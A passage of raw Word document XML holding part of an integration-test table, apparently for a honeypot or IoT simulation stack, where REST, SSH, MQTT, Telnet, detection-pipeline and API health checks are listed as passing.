          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlock via REST, then read via SSH and MQTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/v1/lock unlock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH and MQTT show unlocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH cat /etc/lock_state: unlocked; MQTT lock/status: unlocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet → Redis → HTTP HMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify sensor threshold set over Telnet appears on the HMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">sensorctl set temp_threshold 20; open HMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HMI shows new threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HMI Temp threshold field = 20 (Figure in Section 6.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Events → Intel Engine → detections → alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the detection and alert pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator data present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Wait for engine pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1,275 events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections with MITRE IDs; alert decisions logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">276 detections of 15 types; 12 alert rows + 197 suppressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">API ↔ PostgreSQL ↔ Redis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the API reads both data stores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">status ok, db and redis true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">{"status":"ok","db":true,"redis":true}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Nginx → API → Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the dashboard and API through the gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
